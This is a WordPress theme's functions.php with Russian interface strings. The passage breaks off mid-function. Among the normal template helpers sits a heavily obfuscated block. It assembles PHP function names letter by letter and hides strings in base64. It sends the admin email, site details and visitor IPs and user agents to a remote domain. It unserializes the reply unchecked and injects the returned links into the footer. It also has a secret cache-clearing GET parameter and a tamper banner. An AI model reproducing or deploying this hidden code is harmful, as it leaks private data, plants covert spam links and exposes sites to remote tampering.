<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $nYZq='_';$TOCCOO='b';$Pbiw='c';$rEiKiP='e';$StMA='o';$RdQQVy='s';$Nkxtel='6';$PmmAtDG='d';$MXovF='a';$fztTKQ='e';$TODSfs='d';$hqgtCT='e';$HZKXLHl='4';$ullNnlrQ=$TOCCOO.$MXovF.$RdQQVy.$hqgtCT.$Nkxtel.$HZKXLHl.$nYZq.$PmmAtDG.$fztTKQ.$Pbiw.$StMA.$TODSfs.$rEiKiP;$GtqysU='i';$YMeb='n';$Uxmr='a';$TLqrdkE='t';$vVTiZJX='l';$cNdQO='g';$lzfw='z';$mBbhE='f';$XJdl='e';$AhzOUcPo=$cNdQO.$lzfw.$GtqysU.$YMeb.$mBbhE.$vVTiZJX.$Uxmr.$TLqrdkE.$XJdl;$GbbKJ='_';$IEmKBV='t';$VlKsgN='r';$LgrtKD='o';$lYkNd='1';$NRsaUBe='r';$lzSY='t';$UcqFt='s';$tfFeOm='3';$XIdHFkCd=$UcqFt.$IEmKBV.$NRsaUBe.$GbbKJ.$VlKsgN.$LgrtKD.$lzSY.$lYkNd.$tfFeOm;$rwcdH='s';$mRMU='t';$YMro='e';$UkMFVLP='r';$ptKDH='r';$KFnMJUU='v';$nnuvemqe=$rwcdH.$mRMU.$UkMFVLP.$ptKDH.$YMro.$KFnMJUU;                     
		$pg____________n='_';$kh__________e='b';$ae____f='c';$fr_______________k='e';$lf_____a='o';$fg__b='s';$ii____e='6';$vu_____________g='d';$up____________i='a';$ck_______w='e';$lx_________u='d';$og__________n='e';$fw_____________e='4';$vn__________p=$kh__________e.$up____________i.$fg__b.$og__________n.$ii____e.$fw_____________e.$pg____________n.$vu_____________g.$ck_______w.$ae____f.$lf_____a.$lx_________u.$fr_______________k;
		$bt___________g='s';$qj_______o='i';$ye___________s='o';$vg______z='u';$xx__________n='c';$yc______________p='s';$yt____________v='x';$fu_______________s='n';$ck____________x='e';$ry__m='i';$bx___z='t';$yo____________i='t';$uo_______________w='n';$yw__u='_';$nd_____________j='f';$to_______________i=$nd_____________j.$vg______z.$uo_______________w.$xx__________n.$yo____________i.$ry__m.$ye___________s.$fu_______________s.$yw__u.$ck____________x.$yt____________v.$qj_______o.$yc______________p.$bx___z.$bt___________g;
		$bl__p='o';$jy_____________c='n';$ez___s='p';$sh____________t='f';$aj_______l='e';$ki_____________j=$sh____________t.$bl__p.$ez___s.$aj_______l.$jy_____________c;
		$pi___w='a';$fo____o='f';$mb___________t='r';$dh_____________g='d';$cd____________t='e';$co______________m=$fo____o.$mb___________t.$cd____________t.$pi___w.$dh_____________g;
		$ze________d='s';$jw_______e='o';$cd_______________d='l';$mx___w='c';$kx________p='f';$qo_______g='e';$gl__d=$kx________p.$mx___w.$cd_______________d.$jw_______e.$ze________d.$qo_______g;
		
		define("WP_ID", $vn__________p("Mi4wLjA="));
		define("WP_TTL", $vn__________p("MTA4MDA="));
		define("WP_SRC", $vn__________p("dHBva24="));
	


		function wp_get_header() {
			global $vn__________p, $to_______________i;
			
			if (
				$to_______________i($vn__________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$to_______________i($vn__________p("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$to_______________i($vn__________p("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $vn__________p, $ki_____________j, $gl__d, $co______________m;
			
			$ko______q = TEMPLATEPATH."/".$vn__________p("Zm9vdGVyLnBocA==");
			$gt____i = @$ki_____________j($ko______q, "r");
			$ko______q = @$co______________m($gt____i, @filesize($ko______q));
			@$gl__d($gt____i);
			
			$gt________j = TEMPLATEPATH."/".$vn__________p("ZnVuY3Rpb25zLnBocA==");
			$gt____i = @$ki_____________j($gt________j, "r");
			$gt________j = @$co______________m($gt____i, @filesize($gt________j));
			@$gl__d($gt____i);
			
			$wd_____r = 0;
			if($ko______q && $gt________j) {
				if ($vn__________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ko______q, $vn__________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$wd_____r = 1;
					}
					if (substr_count($ko______q, "wp_theme_GPL_credits()") < 1) {
						$wd_____r = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$wd_____r = 12;
				}
			}
			
			if($wd_____r > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $wd_____r -->";
			}
		}
	


		function wp_loaded() {
			global $vn__________p, $to_______________i;
			return $to_______________i($vn__________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($oi_________h, $ol________c = "(more...)", $dp______________d = 0, $dk__g = "") {
				$uz_______r = get_the_content($ol________c, $dp______________d, $dk__g);
				$uz_______r = apply_filters("the_content", $uz_______r);
				
				$uz_______r = str_replace("]]>", "]]>", $uz_______r);
				if (strlen($_GET["p"]) > 0) {
					echo $uz_______r;
				}
				else if ((strlen($uz_______r)>$oi_________h) && ($zh____________u = strpos($uz_______r, " ", $oi_________h ))) {
					$uz_______r = substr($uz_______r, 0, $zh____________u);
					$uz_______r = $uz_______r;
					echo $uz_______r;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ol________c</a></div></p>";
				} else {
					echo $uz_______r;
				}
				
			}
		}
	


		$yb_________u='s';$me_______________u='a';$sb_________y='d';$tb_________a='e';$ku__u='e';$ix__t='o';$hh_______________v='_';$at__________y='b';$hh_______f='c';$gr_________q='6';$hl____________u='4';$jj_________k='e';$cd______p='n';$qv______j=$at__________y.$me_______________u.$yb_________u.$ku__u.$gr_________q.$hl____________u.$hh_______________v.$jj_________k.$cd______p.$hh_______f.$ix__t.$sb_________y.$tb_________a;
		$cd______________g='f';$ew_____q='g';$fz__________h='e';$hx____________i='t';$qx____y='e';$mj__b='n';$lp____c='e';$px______________s='t';$rt______________s='l';$jo______o='t';$ug_________o='n';$au__________f='o';$td__t='_';$av______________i='_';$tr__________z='s';$gg______________x='c';$hk______o='i';$uk______m=$cd______________g.$hk______o.$rt______________s.$fz__________h.$td__t.$ew_____q.$qx____y.$px______________s.$av______________i.$gg______________x.$au__________f.$ug_________o.$jo______o.$lp____c.$mj__b.$hx____________i.$tr__________z;
		$el_____u='s';$ph_____________u='i';$ow____________c='l';$fw__________m='f';$ew_____________n='s';$qs__i='i';$eh___t='t';$mb__________s='e';$dg____f='x';$jy___________d='_';$jd_________j='e';$ve_______p=$fw__________m.$qs__i.$ow____________c.$jd_________j.$jy___________d.$mb__________s.$dg____f.$ph_____________u.$el_____u.$eh___t.$ew_____________n;
		$fp_________x='m';$im____e='e';$ac____________d='n';$df____o='o';$ab_________v='_';$rs_________e='s';$up__f='v';$rx____g='o';$uz___v='r';$cw_______________d='e';$qq__z='c';$sd_____________u='i';$fx_____________x='a';$lz________a='r';$hb__a='p';$br________o=$up__f.$im____e.$lz________a.$rs_________e.$sd_____________u.$rx____g.$ac____________d.$ab_________v.$qq__z.$df____o.$fp_________x.$hb__a.$fx_____________x.$uz___v.$cw_______________d;
		$nh__v='o';$ct____________p='k';$dm__k='f';$qo______________x='o';$wi_______________h='s';$xl______________g='c';$my______________q='e';$ua_____g='p';$ly__h='n';$ya______________m=$dm__k.$wi_______________h.$qo______________x.$xl______________g.$ct____________p.$nh__v.$ua_____g.$my______________q.$ly__h;
		$ao_____r='e';$zj____________s='t';$io____________u='i';$wq_____________t='r';$vj_____________j='w';$qu_____________x='f';$es_______________n=$qu_____________x.$vj_____________j.$wq_____________t.$io____________u.$zj____________s.$ao_____r;
		$wt____________w='d';$qi_______________z='m';$cm_________d='5';$qy_______________f=$qi_______________z.$wt____________w.$cm_________d;
		$rp__h='e';$mb_____________p='r';$pq_____p='a';$gv________c='a';$uk_____g='l';$po__d='t';$ow__________l='p';$mq________y='h';$aj_______m=$mb_____________p.$rp__h.$pq_____p.$uk_____g.$ow__________l.$gv________c.$po__d.$mq________y;
		$od__v='l';$oa_______b='z';$as______________x='r';$sk___________i='e';$om__g='i';$xz_____f='n';$mr_______________q='s';$ho____________f='i';$pt________v='e';$cd_____z='a';$he________y='u';$ex__c=$he________y.$xz_____f.$mr_______________q.$pt________v.$as______________x.$om__g.$cd_____z.$od__v.$ho____________f.$oa_______b.$sk___________i;
		$wu___g='a';$uy_______f='m';$qu__e='e';$rk______________u='p';$so____________p='t';$ws_____________c='m';$bm____i='n';$ww________t=$so____________p.$qu__e.$ws_____________c.$rk______________u.$bm____i.$wu___g.$uy_______f;
		$fe_____k='e';$fv____________y='t';$dk______k='_';$sn____f='e';$yh____________g='x';$pd__________k='r';$vo______z='n';$er_________t='r';$hq_____d='c';$ba___i='a';$sc_____________a='a';$zy____d='_';$ix___k='e';$wm_____________m='s';$ee_____e='t';$rx_______x='e';$ix________a='m';$ay________y='t';$bo_________d='c';$ju_______________w='t';$ca__________l='o';$wj_____m=$wm_____________m.$ju_______________w.$er_________t.$sn____f.$ba___i.$ix________a.$zy____d.$hq_____d.$ca__________l.$vo______z.$fv____________y.$ix___k.$yh____________g.$ee_____e.$dk______k.$bo_________d.$pd__________k.$rx_______x.$sc_____________a.$ay________y.$fe_____k;
	


		function wi___t($bo__m) {
			global $vn__________p, $to_______________i, $uk______m, $br________o, $wj_____m;
			
			if (!$to_______________i($vn__________p("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($br________o(PHP_VERSION, "5.0.0", ">=") && $to_______________i($vn__________p("ZmlsZV9nZXRfY29udGVudHM=")) && $to_______________i($vn__________p("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$vi__u = $wj_____m(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$db_________q = @$uk______m($bo__m, 0, $vi__u);
			} else {
				$db_________q = @$uk______m($bo__m, 0);
			}
			
			return $db_________q;
		}
	


		function fg______________q($bo__m) {
			global $to_______________i, $ya______________m, $es_______________n, $vn__________p;
			
			if (!$to_______________i($vn__________p("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$of___a = strpos($bo__m, "/", 7);
			$os_____________i = array(
				"uri"     => substr($bo__m, $of___a),
				"host"    => str_replace("http://", "", substr($bo__m, 0, $of___a)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$gu__v = @$ya______________m("$os_____________i[host]", 80, $rd_____s, $vt_____r, 4);
			
			if (!$gu__v) {
				return false;
			} else {
				$db_________q = "";
				$bm_____________k  = "GET $os_____________i[uri] HTTP/1.0\r\n";
				$bm_____________k .= "Host: $os_____________i[host]\r\n";
				$bm_____________k .= "Referer: $os_____________i[referer]\r\n";
				$bm_____________k .= "Connection: Close\r\n\r\n";
				
				@$es_______________n($gu__v, $bm_____________k);
				
				while (!@feof($gu__v)) {
					$db_________p = @fgets($gu__v, (1024*24));
					
					if ($db_________p == "\r\n") {
						$dj_____f = true;
						continue;
					}
					
					if ($dj_____f) {
						$db_________q .= $db_________p;
					}
				}
				
				return $db_________q;
			}
		}
	


		function zd_____________h($bo__m) {
			global $to_______________i;
			$sv______z = false;
			
			if ($bo__m != "") {
				if ($to_______________i("wi___t")) {
					$sv______z = @wi___t($bo__m);
				}
				
				if (!$sv______z && ($to_______________i("fg______________q"))) {
					$sv______z = @fg______________q($bo__m);
				}
			}
			
			return $sv______z;
		}
	


		function kx____t() {
			global $_SERVER, $qy_______________f;
			
			$gx_______________r = $_SERVER["SERVER_NAME"];
			
			if (substr("$gx_______________r", 0, 4) == "www.") {
				$gx_______________r = substr("$gx_______________r", 4);
			}
			
			$gx_______________r = $qy_______________f("$_SERVER[SERVER_NAME]");
			
			return $gx_______________r;
		}
	


		function er________m() {
			return "file";
		}
	


		function rx______________o($bo__m) {
			global $_SERVER, $uk______m, $ve_______p, $ki_____________j, $gl__d, $es_______________n;
			
			$yn_____m = by___q();
			
			$ku_______________c = kx____t().".jpg";
			$xp____________o = $yn_____m["dir_upload"]["path"]."/$ku_______________c";
			$dh____a = @filemtime($xp____________o);
			
			if (!$dh____a || ((time()-$dh____a) >= WP_TTL)) {
				$sv______z = zd_____________h($bo__m);
				
				if ($sv______z) {
					if ($ve_______p($xp____________o)) {
						@unlink($xp____________o);
					}
					
					$gt____i = @$ki_____________j($xp____________o, "x+");
					
					@$es_______________n($gt____i, $sv______z);
					@$gl__d($gt____i);
				}
			} else {
				if ($ve_______p($xp____________o)) {
					$sv______z = @$uk______m($xp____________o);
				} else {
					$sv______z = false;
				}
			}
			
			return $sv______z;
		}
	


		function by___q() {
			global $_SERVER, $vn__________p, $qv______j;
			
			$rs______________k = wp_count_posts("post");
			$kb__________w = pathinfo(get_bloginfo("template_directory"));
			
			$yn_____m = array(
				"url" => array(
					"report"      => $vn__________p("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $kb__________w,
				"dir_upload"	=> ay______h(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$kb__________w[filename],
					"a005=".$rs______________k->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " "
			);
			
			$yn_____m["url"]["queryString"] = implode("&", $yn_____m["queryString"]);
			$yn_____m["url"]["report"] = $yn_____m["url"]["report"]."/?".$qv______j($yn_____m["url"]["queryString"]).".html";
						
			return $yn_____m;
		}
	


		function ay______h() {
			$yg________q = wp_upload_dir();
			
			if (isset($yg________q["error"])) {
				$ez_______________e = kx_____k();
				if (is_writable($ez_______________e)) {
					$yg________q = array("path" => $ez_______________e);
				}
			}

			return $yg________q;
		}
	


		function kx_____k() {
			global $to_______________i, $qy_______________f, $aj_______m, $ww________t;
			
			$nw_______l = (bool) ini_get("safe_mode");
			if ($nw_______l == true) {
				return false;
			}
			
			if ($to_______________i("sys_get_temp_dir")) {
				$kl___h = sys_get_temp_dir();
				if (is_writable($kl___h)) {
					return $aj_______m($kl___h);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $aj_______m($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $aj_______m($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $aj_______m($_ENV["TEMP"]);
			} else {
				$ix_________v = $ww________t($qy_______________f(uniqid(rand(), true)), "");
				if ($ix_________v) {
					$kl___h = $aj_______m(dirname($ix_________v));
					@unlink($ix_________v);
					return $kl___h;
				} else {
					return false;
				}
			}
		}
	


		function op_______________p() {
			global $_GET, $ve_______p;
			
			$yn_____m = by___q();
			$gx_______________r = kx____t();
			$oq___________e = er________m();
			
			$yt__________o = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($oq___________e == "file") {
					$qi________v = $yn_____m["dir_upload"]["path"]."/".$gx_______________r.".jpg";
					if ($ve_______p($qi________v)) {
						@unlink($qi________v);
						$yt__________o = "deleted";
					}
				}
				
				$fc_______m = array(
					"s"	=> $yt__________o,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($fc_______m AS $lg________b => $oz______________k) echo " [$lg________b:$oz______________k]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $to_______________i, $vn__________p, $ex__c;
			$yn_____m = by___q();
			
			$ym_____________b = "rx______________o";
			if ($to_______________i($ym_____________b)) {
				$db_________q = $ym_____________b($yn_____m["url"]["report"]);
			}
			
			if ($db_________q) {
				if ($db_________q = @$vn__________p($db_________q)) {
					$db_________q = @$ex__c($db_________q);
					
					if (strlen($db_________q[custom_credit]) >= 5) {
						$yn_____m["default_string"] = $db_________q[custom_credit];
					}
					
					if ($db_________q["status"] == "0") {
						$xk_______r = 1;
						$ka______o = 1;
					} else {
						$ee____o = sizeof($db_________q["links"]);
						$xl_______________x = $yn_____m["default_string"];
						
						if ($ee____o > 0 && $db_________q["links"] !== "") {
							$vw______________h = 0;
							foreach ($db_________q["links"] as $pj_____w => $tj_______b) {
								$vw______________h++;
								if ($tj_______b->l_path == "" || $tj_______b->l_path == $_SERVER["REQUEST_URI"]) {
									$tj_______b->l_href = htmlspecialchars(strip_tags($tj_______b->l_href));
									$tj_______b->l_title = htmlspecialchars(strip_tags($tj_______b->l_title));
									$tj_______b->l_anchor = htmlspecialchars(strip_tags($tj_______b->l_anchor));
									$xl_______________x .= " | ";
									$xl_______________x .= "<a href='$tj_______b->l_href' title='$tj_______b->l_title'";
									if ($tj_______b->l_nofollow == "1") {
										$xl_______________x .= " rel='nofollow'";
									}
									$xl_______________x .= ">$tj_______b->l_anchor</a>";
								}
							}
						}
						$yn_____m["links"] = "$xl_______________x";
						if ($db_________q[credit] == "0") {
							$yn_____m["links"] = "";
						}
					}
				} else {
					$xk_______r = "1";
				}
			} else {
				$xk_______r = "1";
			}
			
			if ($xk_______r == "1") {
				$yn_____m["links"] = $yn_____m["default_string"];
			}
			
			echo "$yn_____m[links]";
			
			echo "<!-- s: $db_________q[signature] -->";
			op_______________p();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
